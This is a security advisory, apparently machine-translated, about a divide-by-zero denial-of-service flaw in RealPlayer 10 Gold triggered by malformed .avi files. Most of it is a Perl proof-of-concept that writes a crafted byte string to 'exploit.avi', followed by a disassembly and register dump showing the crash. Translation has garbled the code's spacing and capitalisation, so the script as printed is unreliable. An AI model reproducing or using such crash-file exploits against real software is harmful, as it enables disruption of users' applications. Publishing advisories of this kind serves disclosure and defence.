Real Networks RealPlayer '. avi' File zero Denial of Service Vulnerability

Release date:
Updated on:

Affected Systems:
Real Networks RealPlayer
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54220

RealPlayer is a tool used to listen to and watch real-time audio, video, and Flash on the Internet.

RealPlayer 10 Gold has a remote denial of service vulnerability when processing malformed. avi files, which can cause the affected applications to crash.

<* Source: Dark-Puzzle
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Dark-Puzzle () provides the following test methods:

#------------------------------------------------------------------------#
##
# Usage: perl realplayer. pl #
##
#------------------------------------------------------------------------#

My $ h = "\ x4D \ x54 \ x68 \ x64 \ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00
\ X9b \ x0e \ xf3 \ xf8 \ xdb \ xa7 \ x3b \ x6f \ xc8 \ x16 \ x08 \ x7f \ x88 \ xa2 \ xf9 \ xcb
\ X87 \ xab \ x7f \ x17 \ xa9 \ x9f \ xa1 \ xb9 \ x98 \ x8e \ x2b \ x87 \ xcb \ xf9 \ xbe \ x50
\ X42 \ x99 \ x11 \ x26 \ x5c \ xb6 \ x79 \ x44 \ xec \ xe2 \ xee \ x71 \ xd0 \ x5b \ x50 \ x4e
\ X37 \ x34 \ x3d \ x55 \ xc8 \ x2c \ x4f \ x28 \ x9a \ xea \ xd0 \ xc7 \ x6d \ xca \ x47 \ xa2
\ X07 \ xda \ x51 \ xb7 \ x97 \ xe6 \ x1c \ xd5 \ xd8 \ x32 \ xf9 \ xb1 \ x04 \ xa7 \ x08 \ xb2
\ Xe9 \ xfb \ xb5 \ x1a \ xb7 \ xa7 \ x7a \ xa6 \ xf9 \ xf6 \ xc9 \ x93 \ x91 \ xa1 \ x21 \ x29
\ Xa3 \ x1c \ xe3 \ xc7 \ xcb \ x17 \ xfd \ x8d \ x65 \ xfd \ x81 \ x61 \ x6b \ x89 \ xaf \ x53
\ X31 \ x45 \ x0c \ x71 \ xcb \ x93 \ xcb \ x6e \ x2a \ xcf \ xa6 \ x76 \ x1a \ xa8 \ xcc \ xad
\ X81 \ xfd \ xc4 \ x56 \ xa7 \ x82 \ xda \ x3d \ x20 \ x80 \ xff \ x4c \ xbe \ xc0 \ x4c \ x61
\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00
\ X00 \ x00 \ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x00 \ xff ";

# [Disassembly]
# "\ X0C \ x20 \ x87 \ x74" PUSH EBX
# "\ X0D \ x20 \ x87 \ x74" mov eax, dword ptr ss: [EBP + 8]
# "\ X10 \ x20 \ x87 \ x74" mov ebx, dword ptr ss: [EBP + C]
# "\ X13 \ x20 \ x87 \ x74" mov ecx, dword ptr ss: [EBP + 10]
# "\ X16 \ x20 \ x87 \ x74" MUL EBX
# "\ X18 \ x20 \ x87 \ x74" mov ebx, ECX
# "\ X1A \ x20 \ x87 \ x74" shr ebx, 1
# "\ X1C \ x20 \ x87 \ x74" add eax, EBX
# "\ X1E \ x20 \ x87 \ x74" adc edx, 0
# "\ X21 \ x20 \ x87 \ x74" div ecx <---- As we see we can't devise by Zero. So this occurs an error and the program crashes here.

# [Registers]
# EAX 00000000
# ECX 00000000
# Fe-00000000
# EBX 00000000

# Error: Integer Division by Zero ---> Exception handling vulnerability.

# This Exception handling can lead to a DOS attack. However The Concept of using this vulnerability is the create an exception so the program crashes. And it's a local exploit.

 

My $ file = "exploit. avi ";

Open ($ File, "> $ file ");
Print $ File $ h;
Close ($ File );
Print "0 // Exploit By Dark-Puzzle! \ N ";
Print "1 // Follow me: http://fb.me/dark.puzzle \ n ";
Print "0 // avi file Created Enjoy! \ N ";
Print "N. B: If the program says to locate the file just browse into it's directory and select it, if not, Enjoy \ n ";

# End Of Exploit
#--------------------

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Real Networks
-------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://service.real.com/realplayer/security/